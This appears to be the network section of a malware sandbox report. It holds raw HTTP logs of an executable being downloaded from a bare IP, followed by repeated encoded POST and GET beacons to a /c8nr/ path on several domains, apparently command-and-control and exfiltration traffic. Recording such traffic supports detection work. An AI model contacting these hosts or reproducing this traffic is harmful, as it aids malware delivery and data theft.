Network Analysis

GET /350/audiodg.exe HTTP/1.1 Accept: */* Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3) Host: 50.3.182.140 Connection: Keep-Alive

HTTP/1.1 200 OK Date: Sat, 30 Sep 2023 04:20:56 GMT Server: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.1.17 Last-Modified: Wed, 27 Sep 2023 22:43:11 GMT ETag: "6f58a-6065eea85699a" Accept-Ranges: bytes Content-Length: 456074 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: application/x-msdownload

POST /c8nr/ HTTP/1.1 Host: www.whistle.news Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Encoding: gzip, deflate, br Accept-Language: en-us Origin: http://www.whistle.news Referer: http://www.whistle.news/c8nr/ Content-Type: application/x-www-form-urlencoded Content-Length: 171 Cache-Control: max-age=0 Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0

GET /c8nr/?F3=CqYf1SmszDBRcRt3Ry7nuhva6EmhLI5UD2I/eVu+u8EOQktcJMnp9pGxshpp5J7Zxswa5jm29s59MM0LkVDS8/fxra0kqVJlH6+elnA=&rT=Nt-TZZTkeRdw HTTP/1.1 Host: www.whistle.news Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-us Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0

HTTP/1.1 200 OK Server: hcdn Date: Sat, 30 Sep 2023 04:21:30 GMT Content-Type: text/html Content-Length: 10066 Connection: close Vary: Accept-Encoding x-hcdn-request-id: b41e745a4054b4538bb344d7d316eae9-srv-edge1 Expires: Sat, 30 Sep 2023 04:21:29 GMT Cache-Control: no-cache Accept-Ranges: bytes

GET /2017/sqlite-dll-win32-x86-3210000.zip HTTP/1.1 Accept: */* Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3) Host: www.sqlite.org Connection: Keep-Alive

HTTP/1.1 200 OK Connection: keep-alive Date: Sat, 30 Sep 2023 04:21:31 GMT Last-Modified: Thu, 18 Jan 2018 20:17:17 GMT Cache-Control: max-age=120 ETag: "m5a6100cds6cee7" Content-type: application/zip; charset=utf-8 Content-length: 446183

POST /c8nr/ HTTP/1.1 Host: www.charcoal-id.com Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Encoding: gzip, deflate, br Accept-Language: en-us Origin: http://www.charcoal-id.com Referer: http://www.charcoal-id.com/c8nr/ Content-Type: application/x-www-form-urlencoded Content-Length: 3407 Cache-Control: max-age=0 Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0

POST /c8nr/ HTTP/1.1 Host: www.charcoal-id.com Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Encoding: gzip, deflate, br Accept-Language: en-us Origin: http://www.charcoal-id.com Referer: http://www.charcoal-id.com/c8nr/ Content-Type: application/x-www-form-urlencoded Content-Length: 183 Cache-Control: max-age=0 Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0

HTTP/1.1 301 Moved Permanently Connection: close content-type: text/html content-length: 707 date: Sat, 30 Sep 2023 04:21:44 GMT server: LiteSpeed location: https://www.charcoal-id.com/c8nr/

GET /c8nr/?F3=6JSHidr3Bn2iwSUtC4PW4Gvpxg89xUQjO4aPVvfz4xZu1RX38nUjyBfg1u2hjWOcq5dMLqFxHMQyk/L5KrgEpXnP9NcgGvuA1NBUhr0=&rT=Nt-TZZTkeRdw HTTP/1.1 Host: www.charcoal-id.com Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-us Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0

HTTP/1.1 301 Moved Permanently Connection: close content-type: text/html content-length: 707 date: Sat, 30 Sep 2023 04:21:46 GMT server: LiteSpeed location: https://www.charcoal-id.com/c8nr/?F3=6JSHidr3Bn2iwSUtC4PW4Gvpxg89xUQjO4aPVvfz4xZu1RX38nUjyBfg1u2hjWOcq5dMLqFxHMQyk/L5KrgEpXnP9NcgGvuA1NBUhr0=&rT=Nt-TZZTkeRdw

POST /c8nr/ HTTP/1.1 Host: www.waremart.top Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Encoding: gzip, deflate, br Accept-Language: en-us Origin: http://www.waremart.top Referer: http://www.waremart.top/c8nr/ Content-Type: application/x-www-form-urlencoded Content-Length: 3407 Cache-Control: max-age=0 Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0

HTTP/1.1 404 Not Found Date: Sat, 30 Sep 2023 04:21:52 GMT Server: Apache Content-Length: 16052 Connection: close Content-Type: text/html

POST /c8nr/ HTTP/1.1 Host: www.waremart.top Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Encoding: gzip, deflate, br Accept-Language: en-us Origin: http://www.waremart.top Referer: http://www.waremart.top/c8nr/ Content-Type: application/x-www-form-urlencoded Content-Length: 183 Cache-Control: max-age=0 Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0

HTTP/1.1 404 Not Found Date: Sat, 30 Sep 2023 04:21:55 GMT Server: Apache Content-Length: 16052 Connection: close Content-Type: text/html

GET /c8nr/?F3=KVXIGGOevITGxD2WQvY/uYGCDwnSgtX62kxPYtz8ySb+fzNjXSoJfn3Gb7fCEKXq0Dt0VHGAWvVKgT6TbMH6cQbNJ8bX2L8nNVJJ3fQ=&rT=Nt-TZZTkeRdw HTTP/1.1 Host: www.waremart.top Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-us Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0

HTTP/1.1 404 Not Found Date: Sat, 30 Sep 2023 04:21:57 GMT Server: Apache Content-Length: 16052 Connection: close Content-Type: text/html; charset=utf-8

POST /c8nr/ HTTP/1.1 Host: www.calculaqui.com Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Encoding: gzip, deflate, br Accept-Language: en-us Origin: http://www.calculaqui.com Referer: http://www.calculaqui.com/c8nr/ Content-Type: application/x-www-form-urlencoded Content-Length: 3407 Cache-Control: max-age=0 Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0

HTTP/1.1 200 OK Date: Sat, 30 Sep 2023 04:22:03 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: ch1c=b Content-Security-Policy: frame-ancestors 'none'; CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=w0kvzPvPU3Wv3J8A8rgMUiT9ItGVUWzaDfVJ8yDp%2Buf7Ajyydr8BBr7549a78rwVJF%2BGHVRuJBVgC4sAloGX1cXjM79L63P7Kzimnf3YQA7TKYJbX9KVSxDRBuOAVWwqR51ek0I%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 80e9aebe5ee18310-KIX Content-Encoding: gzip alt-svc: h3=":443"; ma=86400

POST /c8nr/ HTTP/1.1 Host: www.calculaqui.com Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Encoding: gzip, deflate, br Accept-Language: en-us Origin: http://www.calculaqui.com Referer: http://www.calculaqui.com/c8nr/ Content-Type: application/x-www-form-urlencoded Content-Length: 183 Cache-Control: max-age=0 Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0

HTTP/1.1 200 OK Date: Sat, 30 Sep 2023 04:22:06 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: ch1c=b Content-Security-Policy: frame-ancestors 'none'; CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=KeV8JtnedXguJfPeCoHuka7CKoJy6Z3fzKKYrjsIoQl4FjfIcxkw9RSnmvRjOToBRS6NC0aDnh1i3ODQnAhCIsrx4OEYfqwRDx0Wwwhrq%2FHGIPY3%2BHJ6QzWd4vZx1yyFdzGQ5vU%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 80e9aece1c8817bb-KIX Content-Encoding: gzip alt-svc: h3=":443"; ma=86400

GET /c8nr/?F3=OjdZwvBuU/ug8o3d94DJyrhInUGEGcqmO1sXFb6TuBXVHy3dgl4nqyV+jYs1QF37euEKRExOzrzz3hz7a5wEHeU8OO/DqHfi+/lveaw=&rT=Nt-TZZTkeRdw HTTP/1.1 Host: www.calculaqui.com Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-us Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0

HTTP/1.1 200 OK Date: Sat, 30 Sep 2023 04:22:08 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: ch1c=b Content-Security-Policy: frame-ancestors 'none'; CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=GrbtCmGNd4U3QdtmxBe8TlXy5hTQRNKDsANguVpxKoB9DAxde2ceAfbCM7vwoQE4qO4HkJka%2FryKeZRFNYsaNHGDt99Hz6k4bUFQdFwb221N792tZHX6jZkstYKqruzGvHdl54M%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 80e9aeddfdf91a18-KIX alt-svc: h3=":443"; ma=86400

POST /c8nr/ HTTP/1.1 Host: www.banking-products.com Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Encoding: gzip, deflate, br Accept-Language: en-us Origin: http://www.banking-products.com Referer: http://www.banking-products.com/c8nr/ Content-Type: application/x-www-form-urlencoded Content-Length: 3407 Cache-Control: max-age=0 Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0

HTTP/1.1 404 Not Found Date: Sat, 30 Sep 2023 04:22:28 GMT Server: Apache Last-Modified: Tue, 29 Aug 2023 07:21:10 GMT ETag: "8271-6040aa7bb7586" Accept-Ranges: bytes Content-Length: 33393 Connection: close Content-Type: text/html; charset=UTF-8

POST /c8nr/ HTTP/1.1 Host: www.banking-products.com Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Encoding: gzip, deflate, br Accept-Language: en-us Origin: http://www.banking-products.com Referer: http://www.banking-products.com/c8nr/ Content-Type: application/x-www-form-urlencoded Content-Length: 183 Cache-Control: max-age=0 Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0

HTTP/1.1 404 Not Found Date: Sat, 30 Sep 2023 04:22:31 GMT Server: Apache Last-Modified: Tue, 29 Aug 2023 07:21:10 GMT ETag: "8271-6040aa7bb7586" Accept-Ranges: bytes Content-Length: 33393 Connection: close Content-Type: text/html; charset=UTF-8

GET /c8nr/?F3=ENL5hTb1LcB7CURkiczdT+ejQGmla3oISTfQo2/YV4hNHnoLkBSgmjHFVmlBRdxgRm3zMdu0VU9DbjiUlLDYulW193G769XwZ3GN77g=&rT=Nt-TZZTkeRdw HTTP/1.1 Host: www.banking-products.com Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-us Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0

HTTP/1.1 404 Not Found Date: Sat, 30 Sep 2023 04:22:33 GMT Server: Apache Last-Modified: Tue, 29 Aug 2023 07:21:10 GMT ETag: "8271-6040aa7bb7586" Accept-Ranges: bytes Content-Length: 33393 Connection: close Content-Type: text/html; charset=UTF-8

POST /c8nr/ HTTP/1.1 Host: www.freeprosoftz.download Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Encoding: gzip, deflate, br Accept-Language: en-us Origin: http://www.freeprosoftz.download Referer: http://www.freeprosoftz.download/c8nr/ Content-Type: application/x-www-form-urlencoded Content-Length: 3407 Cache-Control: max-age=0 Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0

HTTP/1.1 404 Not Found Date: Sat, 30 Sep 2023 04:22:40 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 X-UA-Compatible: IE=edge Link: <https://freeprosoftz.download/wp-json/>; rel="https://api.w.org/" Vary: Accept-Encoding CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=GeXE3FU06RLZUS1knPhq7k3AllU2RHK99qPgxg3AnxdVLUh3QcPELH4IcbTUXzch4BeZqZ7ams1rlYKrDfAj8qMKfL60lHOII8FKKf2JxoTfIE%2Be74wNEvUxDHcHVypSLNZnGnYCLSlOaDbk"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 80e9af9f4a948358-KIX Content-Encoding: gzip alt-svc: h3=":443"; ma=86400

POST /c8nr/ HTTP/1.1 Host: www.freeprosoftz.download Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Encoding: gzip, deflate, br Accept-Language: en-us Origin: http://www.freeprosoftz.download Referer: http://www.freeprosoftz.download/c8nr/ Content-Type: application/x-www-form-urlencoded Content-Length: 183 Cache-Control: max-age=0 Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0

HTTP/1.1 404 Not Found Date: Sat, 30 Sep 2023 04:22:43 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 X-UA-Compatible: IE=edge Link: <https://freeprosoftz.download/wp-json/>; rel="https://api.w.org/" Vary: Accept-Encoding CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=i%2FNNTaBV2jNeSiESonnTR4K8VtmCe74o6wOGY7y3c0EUwwvWhhnAD7b4JlyTdP2YBKTDS1yv5sQojS8Z5WEMVowMuvLz%2FQgWzvKHg63%2BootdkIpqKX74Xg%2BafbGHc04mTAKhO1QbyoUd5IPF"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 80e9afaf0e3619c8-KIX Content-Encoding: gzip alt-svc: h3=":443"; ma=86400

GET /c8nr/?F3=QwWL61OjL6Zjup2of9u7xYwZUk4i9WyrtzOogSBq0fTkVXlsW82z9ucnH56cGKu7VeAvdm+QQh0mLF61TehwZUGfckypRxLgmJoqexY=&rT=Nt-TZZTkeRdw HTTP/1.1 Host: www.freeprosoftz.download Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-us Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0

HTTP/1.1 301 Moved Permanently Date: Sat, 30 Sep 2023 04:22:45 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 X-UA-Compatible: IE=edge X-Redirect-By: WordPress Vary: Accept-Encoding Location: http://freeprosoftz.download/c8nr/?F3=QwWL61OjL6Zjup2of9u7xYwZUk4i9WyrtzOogSBq0fTkVXlsW82z9ucnH56cGKu7VeAvdm+QQh0mLF61TehwZUGfckypRxLgmJoqexY=&rT=Nt-TZZTkeRdw CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=rd5DtL%2Fx73cpA8iTLUC0R7YhZIXoooB2MZtX7kjWgoNfJqqAs7NE06F%2B1stDvYZW5Roqods8Ju1tCmXH9NYQODUdDZjXHQsGL6v2fyy0XBFNswAzKlSwuUXUmNYuInT0YH0GMzlbTXTgsxpM"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 80e9afbeda308316-KIX alt-svc: h3=":443"; ma=86400